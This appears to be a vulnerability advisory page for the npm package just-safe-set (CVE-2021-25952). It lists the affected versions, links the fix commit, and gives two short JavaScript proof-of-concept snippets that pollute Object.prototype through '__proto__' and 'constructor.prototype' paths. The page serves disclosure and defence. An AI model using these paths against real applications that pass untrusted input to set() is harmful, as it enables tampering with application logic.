set value at property, create intermediate properties if necessary
Latest version: 2.2.2
| CVE | Fix |
|---|---|
| CVE-2021-25952 | https://github.com/angus-c/just/commit/dd57a476f4bb9d78c6f60741898dc04c71d2eb53 |
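```js
const set = require('just-safe-set');
// A path that starts with __proto__ makes set() write to Object.prototype.
set({}, '__proto__.a', 'b');
// A fresh object inheriting `a` confirms prototype pollution.
if (({}).a === 'b') console.log('exploitable');
```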
Vulnerable versions: 1.0.0, 1.1.0, 2.0.0, 2.0.1, 2.1.0, 2.2.0, 2.2.1
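```js
const set = require('just-safe-set');
// The same write to Object.prototype, reached through constructor.prototype.
set({}, 'constructor.prototype.a', 'b');
// A fresh object inheriting `a` confirms prototype pollution.
if (({}).a === 'b') console.log('exploitable');
```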
Vulnerable versions: 1.0.0, 1.1.0